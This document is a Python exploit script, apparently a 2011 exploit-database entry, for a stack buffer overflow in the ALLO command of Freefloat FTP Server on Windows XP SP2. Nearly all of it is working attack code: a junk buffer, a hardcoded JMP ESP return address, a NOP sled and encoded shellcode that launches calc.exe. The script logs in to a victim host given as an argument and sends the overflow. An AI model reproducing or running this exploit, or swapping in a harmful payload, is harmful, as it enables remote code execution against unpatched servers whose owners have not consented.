Freefloat FTP Server ALLO Buffer Overflow

`#!/usr/bin/python  
  
# Exploit Title: Freefloat FTP Server ALLO Buffer Overflow Vulnerability  
# Date: 2011 Aug 20  
# Author: Black.Spook  
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip  
# Tested on: Windows XP SP2 EN  
  
  
import socket  
import sys  
  
def usage():  
  
print "usage : ./freefloatftp.py <victim_ip> <victim_port>"  
print "example: ./freefloatftp.py 192.168.1.100 21"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
  
print "\n"   
print "#############################################################################"  
print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #"  
print "#############################################################################"  
print "\n"  
  
  
if len(sys.argv) != 3:  
usage()  
sys.exit()  
  
ip = sys.argv[1]  
port = sys.argv[2]  
  
junk1= "\x41" * 246  
ret = "\xED\x1E\x94\x7C" #7C941EED JMP ESP  
nop = "\x90"* 200  
# windows/exec CMD=calc.exe  
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"  
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"  
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"  
"\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"  
"\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"  
"\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"  
"\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"  
"\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"  
"\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"  
"\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"  
"\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"  
"\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"  
"\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"  
"\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"  
"\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"  
"\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"  
"\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"  
"\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"  
"\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"  
"\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"  
"\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"  
"\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"  
"\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"  
"\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"  
"\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"  
"\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"  
"\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"  
"\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"  
"\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"  
"\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"  
"\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"  
"\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"  
"\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"  
"\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"  
"\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"  
"\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")  
  
  
buff = junk1 + ret + nop + shellcode  
  
try:  
print("[-] Connecting to " + ip + " on port " + port + "\n")  
s.connect((ip,int(port)))  
data = s.recv(1024)  
print("[-] Sending exploit...")  
s.send("USER test\r\n")  
s.recv(1024)  
s.send("PASS test\r\n")  
s.recv(1024)  
s.send("ALLO "+buff+"\r\n")  
s.close()  
print("[-] Exploit successfully sent...")  
except:  
print("[-] Connection error...")  
print("[-] Check if victim is up.")  
  
`